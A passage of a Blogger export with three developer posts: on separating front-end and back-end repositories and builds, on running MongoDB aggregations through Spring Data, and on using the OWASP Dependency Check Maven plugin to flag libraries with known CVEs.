From the perspective of the back-end, all I need to do is send valid HTTP requests. I can use the entire application from cURL if I want to. The back-end simply doesn't care, as long as I send valid HTTP requests in the correct format. The back-end is completely unaware of what consumes its service.<br />
<br />
The front-end has the same perspective, it calls some service at some URL. As long as the response is valid, and the service does as promised, the front-end doesn't care what the back-end is. If it's written in Java, PHP or Ruby it doesn't matter, heck, even a monkey sitting behind a keyboard would work as long as the communication works via the same protocol.<br />
<br />
The front-end, whether it’s an iOS app or web app, is a separate entity from the back-end. They are separate concerns.<br />
<h2>
Version Control</h2>
In the project described above, the web app and the back-end shared the same version control repository. The iOS app had its own repository.<br />
<br />
I asked myself whether the recently decoupled HTML and JavaScript should move into their own repository. The answer was yes, they needed to be in separate repositories. I came to this conclusion by looking at the 'git' history of the project. The history, after the decoupling, seemed to be a chimera: two entities living in the same body.<br />
<br />
On one hand there was the history of the back-end: "changed HTTP call", "Optimised login and made it faster". The other commits were front-end: "Moved navigation to top of screen", "Increased the size of the font".<br />
<br />
These commits were often interwoven, worse yet some front-end changes were considered too 'minor', so they got packed together with 'back-end' changes.<br />
<br />
When looking at the history from a back-end perspective, the commits looked littered with stupid minor stuff some 'front-end' hipster frontender made. Ruining the view of the API.<br />
<br />
When looking through the eyes of the front-ender, the exalted commits to enrich the user's experience were interspersed with commits from a neckbeard ranting on and on about "REST" and "HTTP" and "optimizing". Whatever that meant. It made seeing how the UI changed between versions more difficult.<br />
<br />
What does the background color of a website have to do with an optimization in the login routine? Nothing.<br />
<br />
I also thought about my changes to the front-end and back-end. What if only the changes to the front-end needed to be reverted? That would be very uncomfortable, since the history is so interwoven.<br />
<br />
So from a pure front- or back-ender's perspective, having one repository is very annoying. With the move towards separate jobs for front- and back-enders, not every front-ender is going to know how to solve Java merge conflicts, and vice versa for JavaScript merge conflicts.<br />
<h2>
Building</h2>
I've mentioned <a href="http://nodejs.org/" title="Node.js">Node.js</a> and it has transformed the way we think about JavaScript. The ability to run JavaScript without a browser, from the command line, has led to some pretty exciting options for building JavaScript apps within JavaScript itself.<br />
<br />
<a href="http://gruntjs.com/" title="GruntJS">Grunt</a> is a JavaScript task runner which makes it easy to run specific tasks in series. Everyone can create Grunt tasks, the community has created tasks for: minifying HTML, JavaScript, CSS and images, it has tasks for compiling LESS down to CSS and many more.<br />
<br />
<a href="http://bower.io/" title="Bower">Bower</a> is a dependency manager for the web, which can be used to download third party JavaScript by version. Much like Maven does in the Java world. Bower can even be integrated with Grunt so it can write the correct HTML tags to include the external files for you.<br />
<br />
Using JavaScript to build JavaScript applications means that for the first time JavaScript developers are in control of their own destiny. No longer do you have to depend, as a front-end developer, on the language chosen on the back-end side.<br />
<br />
When you are in control of your own tooling it becomes easier to extend it, and you can use it everywhere. Gone are the days of switching build processes for an AngularJS app when moving from a Ruby back-end to a Java back-end.<br />
<h2>
Deployment</h2>
Deploying a pure JavaScript application on a server is simple, because JavaScript apps are static by nature. In the old model we dynamically generated the HTML on the server to make the app dynamic. Now we use JavaScript to retrieve data via Ajax and use JavaScript itself to dynamically render the app. The JavaScript, HTML and CSS are static: within a given version of the app they don't change each time you serve them.<br />
<br />
So all you need is a web server that is good at serving static files. That is easy, because serving static resources means you can cache the app more easily.<br />
<br />
Plus knowing that an application is static means you can use content delivery networks to serve the application more easily.<br />
<br />
Via Grunt it is possible to generate a deployment-ready package with unique names for each resource, such as images, CSS and HTML. Updating the app becomes as simple as uploading a folder.<br />
<h2>
Cultural</h2>
Suggesting that we move the front-end and back-end into their own repositories, and stop serving the front-end from the back-end, invokes some negative responses:<br />
<br />
"Why put them in separate repositories, I'm a fullstack engineer I do both front- and back-end work. It will just make my life harder."<br />
<br />
"It's so convenient to have to deploy only one package."<br />
<br />
"Maven can do that too, all you need to do is (some magic that a non Java enabled front-ender cannot possibly understand)."<br />
<br />
I think these reactions stem from the fact we've been used to seeing HTML, CSS and JavaScript as byproducts of the actual Java application. It is difficult to change something we've all been doing for so long.<br />
<br />
I think it is a "culture" thing. Once we start seeing web apps as mature applications with their own build processes, conventions and culture, it becomes more natural to separate them from the back-end.<br />
<br />
Here's a thought experiment: you're a developer making a web application in AngularJS, calling a REST service you've created with Spring MVC. Suddenly a wild Pointy-Haired Boss appears with an iOS developer in tow; he's going to make the iOS version of the application.<br />
<br />
Would you include the Objective-C and Swift code in your git repository?<br />
<br />
Would you configure Maven to kick off a Mac mini to start the iOS build process every time you change something on the server?<br />
<br />
Would you like to be emailed when the iOS programmer makes a mistake and the build fails?<br />
<br />
Would you change your release task to submit a version to the App Store?<br />
<br />
Would you hold your release until it has completed the App Store approval process?<br />
<br />
Did you vomit a little bit just thinking about these unholy questions?<br />
<h2>
Conclusion</h2>
Separating the front- and back-end into their own repositories makes it easier to revert changes.<br />
<br />
Building JavaScript apps with JavaScript empowers the front-end to create great reusable tools and conventions, regardless of back-end language.<br />
<br />
Deploying static files is what servers are good at, using Grunt it becomes really easy to generate these static files.<br />
<br />
JavaScript apps are on the same level as iOS or Android apps. They don't belong or are part of the 'server'. Let start treating them as first class citizens of the REST API.Anonymousnoreply@blogger.com14tag:blogger.com,1999:blog-8962763253387334081.post-61167628737907548332014-10-07T11:00:00.000+02:002015-12-14T15:55:41.851+01:00Aggregations in MongoDB with Spring Data<h2>Aggregations in MongoDB</h2><br/>The MongoDB aggregation operations allow us to process data records and return computed results. Aggregation operations group values from multiple documents together, we can perform a variety of operations on the grouped data to return a single result. Spring Data Mongo makes the usage of this feature from your Java application very easy.<br/><a name='more'></a><br/><strong>Example</strong><br/>Given the (very uncommon) collection "factories" with the following documents:<br/><br/><code>{ "_id" : 1, "name" : "bicycle_parts", "produces" : ["wheels", "spokes"], "location" : [ 5.1045178, 51.9850405 ], country: "NL"}<br/>{ "_id" : 2, "name" : "car_parts", "produces" : ["wheels", "engines"], "location" : [ 6.6113998, 53.2228623 ], country: "NL" }</code><br/><br/>Now we want to count the number of factories in the Netherlands that produce all different production parts; we will use an aggregation!<br/>We have to:<br/>- Match all documents with {country:"NL"}. (<a title="Mongo Aggregation Operator Match" href="http://docs.mongodb.org/manual/reference/operator/aggregation/match/" target="_blank">http://docs.mongodb.org/manual/reference/operator/aggregation/match/</a>)<br/>- Unwind the "produces" array to be able to group by the different production parts. (<a title="Mongo Aggregation Operator Produces" href="http://docs.mongodb.org/manual/reference/operator/aggregation/unwind/" target="_blank">http://docs.mongodb.org/manual/reference/operator/aggregation/unwind/</a>)<br/>- Group by the unwound "produces" array elements. 
(<a title="Mongo Aggregation Operator Group" href="http://docs.mongodb.org/manual/reference/operator/aggregation/group/" target="_blank">http://docs.mongodb.org/manual/reference/operator/aggregation/group/</a>)<br/><br/><code>db.factories.aggregate([<br/>{ $match: { "country":"NL" } },<br/>{ $unwind: "produces" },<br/>{ $group: { _id: "$produces", count: { $sum: 1 } } }<br/>]);<br/></code><br/>The aggregation result will look like:<br/><br/><code>{ "_id":"wheels", "count":2 }<br/>{ "_id":"spokes", "count":1 }<br/>{ "_id":"engines", "count":1 }</code><br/><h2>Aggregations With the Mongo Java Driver</h2><br/>We want to call this from our java application, so let's use the Mongo Java driver api:<br/><br/><code>DBCollection factories ...<br/>// create our pipeline operations, first with the $match<br/>DBObject match = new BasicDBObject("$match", new BasicDBObject("country", "NL"));<br/>// The $unwind<br/>DBObject unwind = new BasicDBObject("$unwind", "produces");<br/>// Now the $group operation<br/>DBObject groupFields = new BasicDBObject( "_id", "$produces");<br/>groupFields.put("count", new BasicDBObject( "$sum", 1));<br/>DBObject group = new BasicDBObject("$group", groupFields);<br/>// run aggregation<br/>List pipeline = Arrays.asList(match, unwind, group);<br/>AggregationOutput output = factories.aggregate(pipeline);</code><br/><br/>Nice, now lets change the $match criteria to get all factories within 10 kilometres from a certain point (we use Mongo legacy coordinates here for simplicity):<br/><code>...<br/>DBObject nearPoint = new BasicDBObject("$near", [ 5.1945978, 52.9950905 ]);<br/>nearPoint.put("$maxDistance", 10000);<br/>DBObject match = new BasicDBObject("$match", new BasicDBObject("location", nearPoint));<br/>...</code><br/><br/>We run the new aggregation and... BANG!<br/><br/><code>IllegalArgumentException: "result undefined"</code>... That doesn't tell us much... Now what?<br/>(Actually the exact mongo error message is in the aggregation result, but when the Mongo Java driver tries to construct an AggregationOutput object, it throws the IllegalArgumentException with this general error instead of adding the error message from the db... 
That's why error information gets lost here.)<br/><h2>Spring Data to the rescue</h2><br/><code>List aggregationOperations = new ArrayList();<br/>aggregationOperations.add(MatchOperation.match(Criteria.where("location").near(new Point(5.1945978, 52.9950905))));<br/>aggregationOperations.add(UnwindOperation.unwind("produces"));<br/>aggregationOperations.add(GroupOperation.group("produces").count().as("count"));<br/>AggregationResults result = mongoTemplate.aggregate(newAggregation(aggregationOperations), "factories", AggregateFactoryResult.class);</code><br/><br/>Now we get a Spring data exception with an understandable message directly from the mongodb:<br/><br/><code>org.springframework.dao.InvalidDataAccessApiUsageException: Command execution failed: Error [exception: $near is not allowed inside of a $match aggregation expression]</code><br/><br/>(Actually Spring Data extracts the mongo error message the right way from the MonoDriver result; does it better that the aggregate function of the driver itself!)<br/>Unfortunately the only solution is to not apply a $near clause in the $match expression, but at least we know WHY our aggregation fails!<br/><h2>Benefits of Spring Data usage</h2><br/>- Typesafe AggregationResults; write your own bean result class (AggregateFactoryResult in the example) and Spring Data does the mapping.<br/>- Prevent typos in mongo operation names like "$match" and "$unwind" because Spring Data provides builders for all mongo operations.<br/>- Understandable exceptions (with the introduction of Mongo Java driver version 3, more understandable exceptions are introduced though).<br/><h2>Resources</h2><br/>- <a title="Mongo Aggregation Manual" href="http://docs.mongodb.org/manual/aggregation/" target="_blank">http://docs.mongodb.org/manual/aggregation/</a><br/>- <a title="Mongo Java Driver Tutorial" href="http://docs.mongodb.org/ecosystem/tutorial/use-aggregation-framework-with-java-driver/" target="_blank">http://docs.mongodb.org/ecosystem/tutorial/use-aggregation-framework-with-java-driver/</a><br/>- <a title="Spring Data Mongo Reference Docs" href="http://docs.spring.io/spring-data/data-mongo/docs/1.6.0.RELEASE/reference/html/#mongo.aggregation" target="_blank">http://docs.spring.io/spring-data/data-mongo/docs/1.6.0.RELEASE/reference/html/#mongo.aggregation</a>Bas de Voshttp://www.blogger.com/profile/15309557220477768661noreply@blogger.com1tag:blogger.com,1999:blog-8962763253387334081.post-68739761573791387582014-06-15T19:25:00.000+02:002015-12-14T15:55:41.886+01:00Checking framework vulnerabilities using Dependency Check<p><b>A web-application is never finished. Even when no new features are being developed new vulnerabilities may be found in the frameworks used in the application requiring a patch or an upgrade. Are you actively monitoring the frameworks that are in use in your applications? My guess is no, or at least not all of them.</b> Well, luckily enough OWASP has a <a href="http://jeremylong.github.io/DependencyCheck/index.html">very nice utility</a> that easily integrates into a build environment and can do most of the hard work for you. Let me tell you about it.</p><a name='more'></a><br/><br/><p>The utility is called Dependency Check and is written and maintained by <a href="https://twitter.com/ctxt">Jeremy Long</a>. It comes in four different flavors: a Maven plugin, an Ant task, a commandline script and a Jenkins (build server) plugin. 
In this blog post I will focus on the maven plugin.</p><br/><br/><h3>Integrating Dependency Check into the Maven build</h3><br/><br/><p>Making the Dependency Check plugin a part of the Maven build is easy. It involves declaring the plugin as a part of your build and naming the goal to run (there is only one, check).</p><br/><br/><pre class="lang:xml decode:true"><br/><plugin><br/> <groupId>org.owasp</groupId><br/> <artifactId>dependency-check-maven</artifactId><br/> <version>1.2.1</version><br/> <executions><br/> <execution><br/> <goals><br/> <goal>check</goal><br/> </goals><br/> <configuration><br/> </configuration><br/> </execution><br/> </executions> <br/></plugin><br/></pre><br/><br/><p>There are several <a href="http://jeremylong.github.io/DependencyCheck/dependency-check-maven/configuration.html">configuration options</a> but we'll look into that later. First, lets run the build and see what happens:</p><br/><br/><pre class="lang:xml decode:true"><br/>[INFO] --- dependency-check-maven:1.2.1:check (default) @ someproject ---<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.StandardUpdate update<br/>INFO: NVD CVE requires several updates; this could take a couple of minutes.<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.task.CallableDownloadTask call<br/>INFO: Download Started for NVD CVE - 2002<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.task.CallableDownloadTask call<br/>INFO: Download Started for NVD CVE - 2003<br/>Jun 15, 2014 1:37:15 PM org.owasp.dependencycheck.data.update.task.CallableDownloadTask call<br/>INFO: Download Started for NVD CVE - 2004<br/></pre><br/><br/><p>Ok, this could take a while. Dependency Check tests against the '<a href="http://nvd.nist.gov/">National Vulnerability Database</a>' (NVD) which holds known vulnerabilities of software products. Dependency Check will download the whole NVD once and stores it in your local maven repository. Each subsequent run checks for updates. After that comes the analysis:</p><br/><br/><pre class="lang:xml decode:true"><br/>Jun 15, 2014 1:43:16 PM org.owasp.dependencycheck.Engine analyzeDependencies INFO: Analysis Starting<br/>Jun 15, 2014 1:46:52 PM org.owasp.dependencycheck.Engine analyzeDependencies INFO: Analysis Complete<br/>Jun 15, 2014 1:46:54 PM org.owasp.dependencycheck.maven.DependencyCheckMojo showSummary WARNING:<br/></pre><br/> <br/><p>One or more dependencies were identified with known vulnerabilities:</p><br/><br/><pre class="lang:xml decode:true"><br/>commons-fileupload-1.2.2.jar<br/> (commons-fileupload:commons-fileupload:1.2.2, cpe:/a:apache:commons_fileupload:1.2.2) :<br/> CVE-2014-0050, CVE-2013-0248<br/>javax.servlet.jsp.jstl-1.2.1.jar<br/> (cpe:/a:oracle:glassfish, cpe:/a:oracle:glassfish_server:1.2.1) :<br/> CVE-2013-2566, CVE-2011-5035<br/></pre><br/><br/><p>Oh dear. It seems that my project is vulnerable! The console lists only the summary, a report containing full details are present in <code>./target/dependency-check-report.html</code> </p><br/><br/><h3>How does Dependency Check work?</h3><br/><br/><p>Interestingly enough its current version (1.2.1) doesn't (yet) use the version information available inside the Maven pom. Instead it relies on the contents of the META-INF folder present in most jars or alternatively it looks up the name and version in Sonatype Nexus Repository using the hash of the jar file. 
It then uses that information to form the so called '<a href="http://nvd.nist.gov/cpe.cfm">Common Platform Identifier</a>' (CPI) and uses that to find vulnerabilities in the NVD downloaded before the analysis.</p><br/><br/><p>Vulnerabilities are named using a 'Common Vulnerabilities and Exposures' (CVE) identifier and contain the most important information on a vulnerability. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050">Have a look at one</a>. Note how each entry has a severity score which, on a scale from 1 to 10, indicates how bad the issue is. A score of 7 to 10 indicates a critical flaw. You need to know that this rating means of course, for example the recent <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160">HeartBleed bug in OpenSSL</a> 'only' scored 5.0. Notice the nice red explanation on the why of this 'low' score. Yes, the score only evaluates the direct risk to the system having the vulnerability.</p><br/><br/><p>The NVD database combined with the CPI results in one or more CVE identifiers if your libraries contain known vulnerabilities. By default this doesn't break the build, but you can make it by specifying a highest allowed severity score (using <code>failBuildOnCVSS</code>) in the configuration.</p><br/><br/><h3>Dependency Check results</h3><br/><br/><p>Let's investigate why Dependency Check found some of my jars vulnerable. Lets start with commons-fileupload. <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050">CVE-2014-0050</a>, <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0248">CVE-2013-0248</a> tell me that my version of this library allows for a denial of service attack and the overwriting of arbitrary files. Not good! I definitely need to upgrade this library.</p><br/><br/><p>The other library, the Java standard Tag Library has two CVE's that seem rather odd for its function (<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2566">CVE-2013-2566</a>, <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5035">CVE-2011-5035</a>). The first complains about encryption and the RC4 algorithm. The second is about Hash Collisions. Both seem to be talking about application servers, not a Tag library. If you look at the console output you can see that the library was wrongly identified as <code>oracle:glassfish_server:1.2.1</code></p><br/><br/><h3>False Positives</h3><br/><br/><p>Because of often incomplete data in the META-INF folder and that not all jar files are in the Sonatype Nexus some jars cannot be identified (such as most of the spring-framework jars) or are wrongly identified (e.g. the jstl jar). This means that sometimes vulnerabilities are missed or incorrectly reported. Fortunately Dependency Check has a suppression file which is an easy to fill XML document to suppress false positives (the resulting html report has a button to generate xml snippets for easy copy and pasting). 
Configuring a suppression file is easy:</p><br/><br/><pre class="lang:xml decode:true"><br/><configuration><br/> <suppressionFile>ignore.xml</suppressionFile><br/></configuration><br/></pre><br/><br/><p>And the suppression file itself, with snippets generated by the html report:</p><br/><br/><pre class="lang:xml decode:true"><br/><?xml version="1.0" encoding="UTF-8"?><br/><suppressions xmlns="https://www.owasp.org/index.php/OWASP_Dependency_Check_Suppression"><br/> <suppress><br/> <notes><![CDATA[file name: javax.servlet.jsp.jstl-1.2.1.jar]]></notes><br/> <sha1>7F687140E9D264EE00EAA924714ADF9A82CC18DC</sha1><br/> <cve>CVE-2013-2566</cve><br/> </suppress><br/> <suppress><br/> <notes><![CDATA[file name: javax.servlet.jsp.jstl-1.2.1.jar]]></notes><br/> <sha1>7F687140E9D264EE00EAA924714ADF9A82CC18DC</sha1><br/> <cve>CVE-2011-5035</cve><br/> </suppress><br/></suppressions><br/></pre><br/><br/><p>When the the dependency check is ran now, these two vulnerabilities will no longer be listed for this file.</p><br/><br/><p>My guess is that when Dependency Check will start using the <a href="https://github.com/jeremylong/DependencyCheck/issues/124">dependency information from the maven</a> pom most of these false positives will be history :-)</p><br/><br/><h3>False Negatives</h3><br/><br/><p>Currently Dependency Check is unable to identify all libraries (because of missing metadata and presence in the Sonatype Nexus) - these libraries (easily recognized by the lack of an Identifier in the report) still need manual investigation. Again, the dependency information from the maven pom will reduce these. </p><br/><br/><h3>Performance</h3><br/><br/><p>If you look at the timestamps present in my analysis phase you'll will see that the whole check takes about 3 minutes. This time is mostly spent in talking to the Sonatype Nexus repository, trying to find the version information for the hash of the jar file. This feature can be disabled (you'll loose identification of some jars) by disabling the Nexus analyzer in the configuration file:</p><br/><pre><br/><nexusAnalyzerEnabled>false</nexusAnalyzerEnabled><br/></pre><br/><br/><p>The check now only takes 10 seconds or so. Of course there is no need to check the dependencies for vulnerabilities each time you make a build. A check once a day is more than sufficient. The ideal place to me it seems is the nightly build on the continuous integration server (e.g. Bamboo, Jenkins) - most of the time these builds use a separate profile to which the dependency check plugin can be added without interfering with the developer build. Also perform the check before making a new release of your application.</p><br/><br/><h3>Summary and recommendations</h3><br/><br/><p>OWASP <a href="http://jeremylong.github.io/DependencyCheck/dependency-check-maven/usage.html">Dependency Check</a> is a valuable tool that warns you when you've got outdated libraries with known vulnerabilities as part of your project.</p><br/><br/><p>Currently Dependency Check uses meta data in the library to identify it or looks up the file hash in the Sonatye Nexus. Sometimes this results in a incorrectly identified library with false positives being reported. These are easily suppressed using a suppression file. Also if a library cannot be identified at all, dependency check may not report an vulnerability. However, in an upcoming version support for the dependencies in the Maven pom will be included. 
My guess is that the amount of false positives and false negatives will be greatly reduced.</p><br/><br/><p>I think Dependency Check is best used as part of the nightly build on the continuous integration server and just before a making a release.</p>Anonymoushttp://www.blogger.com/profile/16306207520582389200noreply@blogger.com26